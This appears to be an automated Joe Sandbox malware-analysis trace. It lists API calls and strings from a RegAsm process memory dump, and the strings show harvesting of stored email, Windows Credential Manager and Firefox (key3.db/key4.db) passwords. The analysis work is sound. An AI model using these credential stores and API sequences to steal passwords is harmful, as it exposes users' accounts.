                                                                                                                                                                                                                      • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                                                                                      • API String ID: 1348940319-1729847305
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                      • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00405E80
                                                                                                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 00405E98
                                                                                                                                                                                                                      • GetWindow.USER32(00000000), ref: 00405E9B
                                                                                                                                                                                                                        • Part of subcall function 004015B0: GetWindowRect.USER32(?,?), ref: 004015BF
                                                                                                                                                                                                                        • Part of subcall function 004015B0: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015DA
                                                                                                                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00405EA7
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 00405EBE
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000000), ref: 00405ED0
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000000), ref: 00405EE2
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 00405EF0
                                                                                                                                                                                                                      • SetFocus.USER32(00000000), ref: 00405EF3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Item$Rect$ClientFocusPoints
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2432066023-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FA1E
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                                                                                                                                                      • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                                                                                      • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                                                                      • API String ID: 945165440-3589380929
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004094C8
                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                                                                                                                                      • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040950C
                                                                                                                                                                                                                      • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 00409531
                                                                                                                                                                                                                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                                                                                      • String ID: sysdatetimepick32
                                                                                                                                                                                                                      • API String ID: 3411445237-4169760276
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040FE20), ref: 0040FFBF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                                                                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                                      • API String ID: 4139908857-3953557276
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$FreeLoad
                                                                                                                                                                                                                      • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                                                                      • API String ID: 534179979-4258758744
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                                                                                                                                                                      • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                                                                                                                                                                        • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                                                                                                                                                                        • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                                                                                                                                                                        • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                                                                                                                                                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Item$DialogMessageSend
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2485852401-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                                                                                                                                      • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                                                                                                                                      • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3642520215-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2313361498-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040BB33
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                                                                                                                                                                                      • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                                                                                                                                                                                      • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2126104762-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 004072FB
                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008,?,?,?,?,?,?,004012E4,?), ref: 0040730D
                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(004012E4,0000000A,?,?,?,?,?,?,004012E4,?), ref: 00407316
                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                                                                                                                      • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                                                                                                                      • MoveWindow.USER32(004012E4,?,?,?,?,00000001), ref: 00407371
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1999381814-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                      • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                                                                                      • API String ID: 1297977491-3883738016
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                                                                                                                                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                                                                                                                                        • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                                                        • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                                                                                                                                        • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                                                                                                                                        • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID: gj
                                                                                                                                                                                                                      • API String ID: 438689982-4203073231
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __aulldvrm$__aullrem
                                                                                                                                                                                                                      • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                                                                                                                                      • API String ID: 643879872-978417875
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                                                        • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset$strlen$_memicmp
                                                                                                                                                                                                                      • String ID: user_pref("
                                                                                                                                                                                                                      • API String ID: 765841271-2487180061
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004058C3
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 00405976
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4281309102-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                        • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040A921
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                                                                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                      • API String ID: 1631269929-4153097237
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                                                        • Part of subcall function 00409240: _itoa.MSVCRT ref: 00409261
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                                      • LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                                                        • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D5C
                                                                                                                                                                                                                        • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D7A
                                                                                                                                                                                                                        • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D98
                                                                                                                                                                                                                        • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408DA8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408DCA
                                                                                                                                                                                                                      • strings, xrefs: 00408E27
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                                                                                                                                                                                                      • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                                                                                                                                                                                                      • API String ID: 4036804644-4125592482
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040810E
                                                                                                                                                                                                                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,00000000,770145ED,?), ref: 004081B9
                                                                                                                                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: QueryValue$ByteCharFreeLibraryLoadLocalMultiWide_mbscpymemcpymemsetstrlen
                                                                                                                                                                                                                      • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                                                                                      • API String ID: 3974279409-2190619648
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00406BFF
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00406C0D
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: strlen$_mbscat_mbscpymemset
                                                                                                                                                                                                                      • String ID: key3.db$key4.db
                                                                                                                                                                                                                      • API String ID: 581844971-3557030128
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                                                                                      • String ID: 0$6
                                                                                                                                                                                                                      • API String ID: 2300387033-3849865405
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004076D7
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407710
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407733
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                                                                      • String ID: %s (%s)
                                                                                                                                                                                                                      • API String ID: 3756086014-1363028141
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscat$memsetsprintf
                                                                                                                                                                                                                      • String ID: %2.2X
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004091EC
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00409201
                                                                                                                                                                                                                        • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                                                                                                                                        • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                                                                                        • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                                                                                                                                      • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                                                                                                                      • String ID: caption$dialog_%d
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • unknown error, xrefs: 004277B2
                                                                                                                                                                                                                      • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                                                                                                                                                      • no such savepoint: %s, xrefs: 00426A02
                                                                                                                                                                                                                      • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                                                                                                                                                      • abort due to ROLLBACK, xrefs: 00428781
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                                                                                                                                                                                        • Part of subcall function 0044257F: memcmp.MSVCRT ref: 004425C8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
